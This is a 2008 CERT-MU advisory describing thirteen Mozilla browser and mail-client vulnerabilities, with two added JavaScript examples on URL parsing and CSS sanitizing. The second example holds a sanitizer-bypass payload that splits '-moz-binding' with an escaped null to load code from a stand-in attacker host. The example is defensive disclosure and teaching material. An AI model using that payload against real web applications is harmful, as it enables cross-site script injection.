CERT-MU AD-2008-22

Multiple Vulnerabilities in Mozilla products

Original issue date: 22 December, 2008

Overview

Multiple vulnerabilities have been reported in Mozilla Firefox, SeaMonkey and Thunderbird which could allow a remote attacker to bypass certain security restrictions, disclose sensitive information, or potentially compromise an affected system.

Description

1. Mozilla layout engine crash vulnerability (CVE-2008-5500)

Memory corruption vulnerabilities exist in the layout engine of Mozilla Firefox 3.x and 2.x, Thunderbird 2.x and SeaMonkey 1.x which could allow remote attackers to execute arbitrary code or cause a denial-of-service (application crash) condition on the target system. A remote attacker can exploit these vulnerabilities by creating a specially crafted HTML file that, when loaded by the target user, triggers a reachable assertion or an integer overflow in the layout engine, corrupting memory. Any resulting code executes with the privileges of the target user.

2. Mozilla assertion failure layout engine crash vulnerability (CVE-2008-5501)

A memory corruption vulnerability exists due to an assertion failure in the layout engine of Mozilla Firefox 3.x, Thunderbird 2.x and SeaMonkey 1.x which could allow remote attackers to execute arbitrary code or cause a denial-of-service (application crash) condition on the target system.

Mozilla Firefox 2.x is not affected by this vulnerability.

3. JavaScript engine crash vulnerability (CVE-2008-5502)

A memory corruption vulnerability exists in the GetXMLEntity() method of the JavaScript engine shipped with Mozilla Firefox 3.x before 3.0.5, Thunderbird 2.x, and SeaMonkey 1.x which could allow remote attackers to execute arbitrary code or cause a denial-of-service (application crash) condition on the target system.

Mozilla Firefox 2.x is not affected by this vulnerability.

4. XBL binding same origin policy bypass vulnerability (CVE-2008-5503)

This vulnerability is caused by an improper same origin policy check performed by the loadBindingDocument() function in Mozilla Firefox 2.x, Thunderbird 2.x, and SeaMonkey 1.x. It could allow remote attackers to read or access data from other domains via crafted XBL bindings.

Workarounds  

Disable JavaScript until a version containing these fixes can be installed.

5. Mozilla Firefox 2 feed preview arbitrary JavaScript execution Vulnerability (CVE-2008-5504)

A vulnerability exists in the feed preview functionality of Mozilla Firefox 2.x before 2.0.0.19, which could allow remote attackers to run arbitrary JavaScript with chrome privileges on systems running an affected version.

Firefox 3, Thunderbird and SeaMonkey are not affected by this issue.

Workarounds

Disable JavaScript until a version containing these fixes can be installed.

6. Mozilla Firefox 3 XUL persist attribute privacy violation vulnerability (CVE-2008-5505)

This vulnerability in Mozilla Firefox 3.x before 3.0.5 could allow remote attackers to store cookie-like information on a user's computer, even with cookies turned off, by using the 'persist' attribute of XUL elements. The stored information can later be retrieved by a website. A website could therefore write persistent data into a user's browser and track the user across browsing sessions. Additionally, this issue could allow a website to bypass the limits normally placed on cookie size and number.

7. XMLHttpRequest 302 response disclosure vulnerability (CVE-2008-5506)

This vulnerability is caused by an error in how Mozilla Firefox 3.x and 2.x, Thunderbird 2.x, and SeaMonkey 1.x process an XMLHttpRequest to a web server that redirects the browser with an HTTP 302 status code. This can be exploited to bypass the same-origin policy and disclose sensitive cross-domain response information, e.g. URL parameters and content in the response body.

A remote attacker can exploit this vulnerability by causing the browser to issue an XMLHttpRequest to an attacker-controlled resource which redirects the browser via an HTTP 302 response to a different domain, then reading content from the redirected response.

Workarounds  

Disable JavaScript until a version containing these fixes can be installed.

8. JavaScript URLs error message same origin policy bypass vulnerability (CVE-2008-5507)

This vulnerability in Mozilla Firefox 3.x and 2.x before 2.0.0.20, Thunderbird 2.x, and SeaMonkey 1.x could allow remote attackers to bypass the same origin policy and disclose sensitive information from another domain. It is caused by an error when processing JavaScript URLs that redirect the browser to another domain which returns non-JavaScript data. When the browser attempts to load the non-JavaScript data as JavaScript, a syntax error is generated that can reveal part of the file's content via the window.onerror DOM API.

Note: On Windows, Firefox 2.0.0.20 has been released to resolve this issue.

Workarounds  

Disable JavaScript until a version containing these fixes can be installed.

9. Leading whitespace and control character URLs improper parsing vulnerability (CVE-2008-5508)

A URL parsing vulnerability exists in Mozilla Firefox 3.x and 2.x, Thunderbird 2.x and SeaMonkey 1.x, which could allow remote attackers to misrepresent URLs and facilitate phishing attacks.

This vulnerability is caused by an error when processing URLs that start with whitespace or certain control characters, which leads to incorrect parsing and a malformed URL being output by the parser.
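The defensive lesson behind this class of URL bug, as an added example that is not Mozilla code and not part of the original advisory: a link filter that inspects the raw href string is defeated by a leading tab or control byte, while one that parses first and compares the canonical hostname is not. The code uses Node's WHATWG URL class, which strips leading and trailing C0 control characters and spaces before reading the scheme and host; the denylist, the evil.example host and the sample hrefs are constructed for the illustration.

```javascript
// Added example, not Mozilla code: make allow/deny decisions on the parsed
// URL, never on the raw string. URL parsers (here Node's WHATWG URL class)
// strip leading and trailing C0 control characters and spaces before they
// read the scheme and host, so a raw-string check and the parser can
// disagree about where the link really goes.

const DENIED_HOSTS = new Set(["evil.example"]); // constructed denylist

// Fragile: a single leading tab or control byte defeats the prefix test.
function rawStringDenies(href) {
  return href.toLowerCase().startsWith("http://evil.example");
}

// Robust: parse first, then compare the canonical (lower-cased) hostname.
// Anything that does not parse is denied rather than passed through.
function parsedUrlDenies(href) {
  let url;
  try {
    url = new URL(href);
  } catch {
    return true;
  }
  return DENIED_HOSTS.has(url.hostname);
}

// Honest hrefs never start with C0 controls or spaces; flag them so the
// log records what the parser silently discarded.
function hasLeadingControlOrSpace(href) {
  return /^[\u0000-\u0020]/.test(href);
}

// Constructed samples: the plain URL, then the same target behind junk.
const SAMPLES = [
  "http://evil.example/login",
  " \t\u0001http://evil.example/login",
  "\u0008HTTP://EVIL.example/login",
];

function evaluate(href) {
  return {
    href: JSON.stringify(href),
    leadingJunk: hasLeadingControlOrSpace(href),
    rawDenied: rawStringDenies(href),
    parsedDenied: parsedUrlDenies(href),
  };
}

console.table(SAMPLES.map(evaluate));
```

Run it with `node` to see the table: only the first sample is caught by the raw-string check, while all three are denied once the hostname is taken from the parsed URL. The same principle applies to allowlists: compare `url.protocol` and `url.hostname` after parsing, and treat a leading control character as a reason to reject or log rather than something to tolerate.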

10. CSS parser ignored escaped null characters vulnerability (CVE-2008-5510)

This vulnerability is caused by an error in the CSS parser of Mozilla Firefox 3.x and 2.x, Thunderbird 2.x, and SeaMonkey 1.x when handling the escaped null character '\0'. The CSS parser ignores the escaped null, so a keyword that a web application blocks can be split with '\0' and still be interpreted as the original keyword; this could allow remote attackers to bypass protection mechanisms such as script sanitization routines in web applications.
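The sanitizer bypass described above, modelled in working code as an added example (not Mozilla code and not part of the original advisory): a CSS filter that pattern-matches the raw text beside a hardened one that decodes CSS escapes first. `decodeCssEscapes` with `dropNull` stands in for a parser that silently drops an escaped null; the blocklist, the `-moz-binding` payload and the attacker.example URL are constructed for the illustration.

```javascript
// Added example, not Mozilla code: why a CSS sanitizer must decode escapes
// before matching. A parser that drops an escaped null ("\0") turns
// "-moz-bi\0nding" into "-moz-binding", so a raw-text blocklist never sees it.

// Constructed blocklist of property/value tokens the application refuses.
const BLOCKED = [/-moz-binding/i, /expression\s*\(/i, /javascript:/i];

// Decode CSS backslash escapes: "\" + 1..6 hex digits (+ optional single
// whitespace), or "\" + any other character standing for itself.
// dropNull=true models the pre-fix behaviour: an escape decoding to U+0000
// vanishes. The spec-conformant behaviour is to substitute U+FFFD.
function decodeCssEscapes(css, { dropNull = false } = {}) {
  return css.replace(
    /\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|([^\n\r\f]))/g,
    (_match, hex, ch) => {
      if (hex === undefined) return ch; // "\-" -> "-"
      const cp = parseInt(hex, 16);
      if (cp === 0) return dropNull ? "" : "\uFFFD";
      if (cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) return "\uFFFD";
      return String.fromCodePoint(cp);
    },
  );
}

// Naive sanitizer: matches the blocklist against the text as submitted.
function naiveAllows(css) {
  return !BLOCKED.some((re) => re.test(css));
}

// Hardened sanitizer: match against what a parser will actually interpret.
// Both the spec-conformant decoding and the legacy null-dropping decoding
// are checked, because the sanitizer cannot know which parser renders the
// page.
function hardenedAllows(css) {
  const conformant = decodeCssEscapes(css);
  const legacy = decodeCssEscapes(css, { dropNull: true });
  return naiveAllows(conformant) && naiveAllows(legacy);
}

// Constructed payload: the blocked keyword split by an escaped null.
const PAYLOAD = String.raw`width: 1px; -moz-bi\0nding: url("http://attacker.example/x.xml#b")`;

console.log("raw text passes naive filter:", naiveAllows(PAYLOAD)); // true
console.log("legacy parser sees:", decodeCssEscapes(PAYLOAD, { dropNull: true }));
console.log("hardened filter allows:", hardenedAllows(PAYLOAD)); // false
```

The hardened filter deliberately checks two decodings rather than one: a sanitizer that only canonicalizes the way the current specification says would still let the payload through to a browser that drops the null. When the set of downstream parsers is unknown, reject input that is dangerous under any plausible interpretation.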

11. Unloaded document XBL binding XSS vulnerability (CVE-2008-5511)

This vulnerability is caused by an error in how Mozilla Firefox 3.x and 2.x, Thunderbird 2.x, and SeaMonkey 1.x process an XBL binding attached to an unloaded document. It could be exploited by remote attackers to bypass the same origin policy and conduct cross-site scripting (XSS) attacks, executing arbitrary JavaScript within the context of a different website.

This vulnerability can be exploited by creating an HTML document with a specially crafted XBL binding and enticing the user to load the crafted document.

Workarounds  

Disable JavaScript until a version containing these fixes can be installed.

12. XPCNativeWrappers arbitrary JavaScript execution vulnerability (CVE-2008-5512)

This vulnerability is caused by errors in the XPCNativeWrappers of Mozilla Firefox 3.x and 2.x, Thunderbird 2.x, and SeaMonkey 1.x. It could be exploited by remote attackers to pollute XPCNativeWrappers and execute arbitrary JavaScript code with chrome privileges.

A remote attacker can exploit this vulnerability by creating a specially crafted HTML document that, when loaded by the target user, will invoke XPCNativeWrappers to execute arbitrary JavaScript with chrome privileges.

Workarounds  

Disable JavaScript until a version containing these fixes can be installed.

13. Firefox Session restore feature vulnerability (CVE-2008-5513)

This vulnerability is caused by errors in the session-restore feature of Mozilla Firefox 3.x and 2.x, which could be exploited by remote attackers to bypass the same origin policy, inject content into documents associated with other domains, and conduct cross-site scripting (XSS) attacks.

The session restore feature in Mozilla Firefox 3.x and 2.x does not properly store the SessionStore data. A remote attacker can exploit this issue to inject arbitrary content into an incorrect document storage location; when the stored SessionStore data is later restored, the injected content could execute arbitrary JavaScript code in a different domain or with chrome privileges.

Thunderbird 2.x and SeaMonkey 1.x are not affected by this vulnerability.

Workarounds  

Disable JavaScript or the session-restore feature until a version containing these fixes can be installed.

Affected systems
 

• Mozilla Firefox 3.0.4 and earlier 3.x releases
• Mozilla Firefox 2.0.0.18 and earlier 2.x releases
• Mozilla Thunderbird 2.0.0.18 and earlier
• Mozilla SeaMonkey 1.1.13 and earlier

Impact

Severity Rating: High

Solution

Mozilla Firefox 3.x users should update to Mozilla Firefox 3.0.5:
http://www.mozilla.com/en-US/firefox/all.html

Mozilla Firefox 2.x users should update to Mozilla Firefox 2.0.0.20:
http://www.mozilla.com/en-US/firefox/all-older.html

Mozilla SeaMonkey users should update to SeaMonkey 1.1.14:
http://www.seamonkey-project.org/releases/

Mozilla Thunderbird users should update to Thunderbird 2.0.0.19.

Disclaimer

The information provided herein is on "as is" basis, without warranty of any kind.

Vendor Information

Mozilla
http://www.mozilla.org/security/announce/2008/mfsa2008-60.html

http://www.mozilla.org/security/announce/2008/mfsa2008-61.html

http://www.mozilla.org/security/announce/2008/mfsa2008-62.html

http://www.mozilla.org/security/announce/2008/mfsa2008-63.html

http://www.mozilla.org/security/announce/2008/mfsa2008-64.html

http://www.mozilla.org/security/announce/2008/mfsa2008-65.html

http://www.mozilla.org/security/announce/2008/mfsa2008-66.html

http://www.mozilla.org/security/announce/2008/mfsa2008-67.html

http://www.mozilla.org/security/announce/2008/mfsa2008-68.html

http://www.mozilla.org/security/announce/2008/mfsa2008-69.html

CVE Name

CVE-2008-5500

CVE-2008-5501

CVE-2008-5502

CVE-2008-5503

CVE-2008-5504

CVE-2008-5505

CVE-2008-5506

CVE-2008-5507

CVE-2008-5508

CVE-2008-5510

CVE-2008-5511

CVE-2008-5512

CVE-2008-5513

References

Secunia
http://secunia.com/advisories/33184/

http://secunia.com/advisories/33203/


SecurityFocus
http://www.securityfocus.com/bid/32882/


SecurityTracker
http://securitytracker.com/alerts/2008/Dec/1021417.html

http://www.securitytracker.com/alerts/2008/Dec/1021428.html

http://www.securitytracker.com/alerts/2008/Dec/1021427.html

http://www.securitytracker.com/alerts/2008/Dec/1021437.html

http://securitytracker.com/alerts/2008/Dec/1021418.html

http://www.securitytracker.com/alerts/2008/Dec/1021429.html

